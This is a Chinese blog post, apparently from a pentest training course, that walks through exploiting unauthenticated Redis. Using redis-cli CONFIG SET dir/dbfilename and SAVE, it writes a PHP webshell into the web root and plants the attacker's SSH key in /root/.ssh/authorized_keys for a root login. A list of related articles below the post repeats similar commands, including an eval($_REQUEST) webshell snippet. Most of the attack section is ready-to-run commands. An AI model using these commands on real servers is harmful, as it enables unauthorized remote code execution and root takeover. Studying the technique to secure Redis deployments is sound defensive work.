Redis未授权访问漏洞的利用

最新推荐文章于 2024-06-22 21:21:09 发布
最新推荐文章于 2024-06-22 21:21:09 发布
阅读量173 收藏
点赞数
分类专栏: 网络安全 内网渗透 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103711040
版权

渗透学习交流群:群内定期通知课程直播时间及地址,欢迎大家进群学习交流!
 利用redis写webshell
 在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save

 然后看一下目录下是否生成了一个redis.php的文件

 可以看到生成了,查看一下文件的内容

 在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell

 Redis 未授权访问配合 SSH key 文件利用
 首先在攻击机生成密匙:ssh-keygen –t rsa

 看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容

 然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt

 然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save

 然后去目标机看一下是否生成

 然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133

                                                  BY易锦教育正式班学员墨森
L18296069161
关注
专栏目录
Redis-Shell
sunhuiliang85的专栏
07-15 6106
Redis Shell 一. redis-cli 1.1 查看redis-cli命令帮助 redis-cli help 查看redis-cli命令帮助 [devuser@iz2ze2ehfvske0t6zflgupz ~]$redis-cli help redis-cli 3.2.4 To get help about Redis commands type: "help
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1339
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
利用redis写webshell
八月的专栏
03-13 1364
redis和mongodb我之所见 最近自己在做一些个人的小创作、小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识。 都是所谓的“非关系型数据库”,有什么区别么? 实际上,在我看来,redis的角色更接近于memcache,而mongodb是一个真正的数据库。 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,比memca
六、利用redis写webshell
dahege666的博客
03-02 899
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 服务器配置phpstudy ,截图略过 1. 下载Phpstudy for Linux的bin文件 操作命令: wget -c http://lamp.phpstudy.net/phpstudy.bin 2. 配置phpstudy.bin文件的可执...
redis写webshell
干铮的博客
01-31 790
利用redis写webshell kali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28 192.168.3.28:6379> config set dir /usr/local/nginx/html OK 192.168.3.28:6379> config set dbfilename shell.php OK 192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1174
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权访问漏洞
周星星的博客
08-22 1533
Redis授权访问漏洞复现以及利用
Redis写webshell
weixin_54227009的博客
06-06 656
如果网站上开了写权限的话,redis连上,可以直接写个一句话命令如下:config set dit /var/www/htmlconfig set dbfilename shell.phpset x ""save我这里dir有问题,所以就没实操了
Redis webshell详解
m0_54313550的博客
04-19 506
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
web中间件漏洞-Redis漏洞授权访问漏洞-写webshell、写ssh公钥
最新发布
Alsn86的博客
06-22 391
利用redis授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
SSRF+redis写入webshell
qq_43665434的博客
04-03 1606
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redis和web服务(redis授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf和redis授权访问写入webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell写入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下写入
Redis 授权访问 写入webshell记录
qq_38053759的博客
04-08 895
Redis 授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
redis授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 744
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
redis写shell与ssh免密码登陆
weixin_33971130的博客
03-13 356
redis-cli参数:-h:指定要连接的主机IP或域名-p:指定连接的端口-a:指定密码-r:执行指定的命令-n:数据库名-x:将最后一个参数输出为valueredis写shell-----端口6379redis-cli-h127.0.0.1configsetdirar/www/webroot/configsetdbfilenameredis.phpsetweb...
攻防演练 | redis艰难写shell进入内网
zkaqlaoniao的博客
04-11 773
更改好权限,又有绝对路径后,终于可以愉快的写shell了,结果在连上的一瞬间,看见站点的根目录下已经存在很多webshell文件了,果然在每一个你所向往的林荫小路中,其实早已车水马龙,不过幸好目标单位还没下线,还可以再吃点分!方法一需要服务器权限,且需要重启服务,很显然咱们不具备这个条件,也没这个胆量,怕重启起不来人就傻了,只能用方法二尝试一下了,结果还真的可以了!且phpinfo中泄漏了站点的绝对路径!环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值